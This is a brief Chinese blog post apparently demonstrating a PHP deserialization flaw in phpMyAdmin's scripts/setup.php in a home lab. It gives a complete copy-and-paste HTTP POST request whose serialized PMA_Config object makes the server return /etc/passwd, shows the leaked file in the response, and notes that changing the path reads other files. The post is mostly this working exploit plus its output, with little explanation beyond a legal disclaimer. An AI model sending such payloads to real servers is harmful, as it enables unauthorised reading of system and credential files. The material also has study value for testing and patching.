反序列化漏洞演示

简介: 反序列化漏洞演示

一、环境

小受:192.168.139.128 Ubuntu

小攻:192.168.139.133 Kali

二、打开BurpSuite将下面数据包内容复制到Repeater模块

POST /scripts/setup.php HTTP/1.1
Host: 192.168.139.128:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

image.png

三,点击发送,在响应包里可以看到/etc/passwd文件内容,通过修改该目录可以查看其它文件

HTTP/1.1 200 OK
Date: Fri, 16 Jul 2021 03:45:28 GMT
Server: Apache/2.4.10 (Debian) PHP/5.4.45
X-Powered-By: PHP/5.4.45
Set-Cookie: phpMyAdmin=ehAgONg1SyelTgUsjNoS9OVOa27; path=/scripts/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1337
Connection: close
Content-Type: text/html
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
<br />
<b>Fatal error</b>:  Cannot use object of type PMA_Config as array in <b>/var/www/html/scripts/setup.php</b> on line <b>35</b><br />

禁止非法,后果自负

目录
相关文章
|
4天前
|
存储 前端开发 JavaScript
反射型 XSS 攻击演示(附链接)
反射型 XSS 攻击演示(附链接)
|
4天前
|
JSON 缓存 安全
Java反序列化漏洞自动挖掘方法
Java反序列化漏洞自动挖掘方法
51 0
|
4天前
|
JSON 安全 fastjson
BurpSuite插件 -- FastjsonScan(反序列化检测)
BurpSuite插件 -- FastjsonScan(反序列化检测)
74 0
|
11月前
|
算法 Java 对象存储
序列化与反序列化——作为Java开发,应该避开这些坑
阅读本文,将带你了解几个问题: 1.序列化与反序列化的概念 2.子类实现Serializable接口,父类没有实现,子类可以序列化吗? 3.类中存在引用对象,这个类对象在什么情况下可以实现序列化? 4.同一个对象多次序列化之间有属性更新,前后的序列化有什么区别?
139 0
序列化与反序列化——作为Java开发,应该避开这些坑
|
12月前
|
存储 安全 PHP
【反序列化漏洞】phar反序列化原理&实例分析
简单来说phar就是php压缩文档。它可以把多个文件归档到同一个文件中,而且不经过解压就能被 php 访问并执行,与file:// php://等类似,也是一种流包装器。
194 0
|
12月前
|
存储 SQL 缓存
干货 | PHP反序列化原理及不同类别反序列化漏洞总结
干货 | PHP反序列化原理及不同类别反序列化漏洞总结
182 0
|
12月前
|
存储 缓存 安全
【WEB安全】不安全的反序列化
1.1. 什么是序列化和反序列化 序列化和反序列化是指用于将对象或数据结构转换为字节流的过程,以便在不同系统之间进行传输或存储,并在需要时重新构造。 序列化是指将对象或数据结构转换为字节流的过程。 在序列化过程中,对象的状态和数据被转换为一系列字节,这些字节可以按照一定的协议进行传输或存储。序列化通常用于将对象存储到磁盘或通过网络发送到其他系统。序列化后的字节流可以被保存下来,以后
136 0
|
Java Shell Maven
Fashjson1.2.27反序列化复现
Fashjson1.2.27反序列化复现
Fashjson1.2.27反序列化复现
|
SQL 安全 Java
PHP反序列化漏洞原理及示例
PHP反序列化漏洞原理及示例
195 0
PHP反序列化漏洞原理及示例
|
安全
Struts2反序列化漏洞复现
环境: vulhub 环境搭建 进入s2-048目录
248 0
Struts2反序列化漏洞复现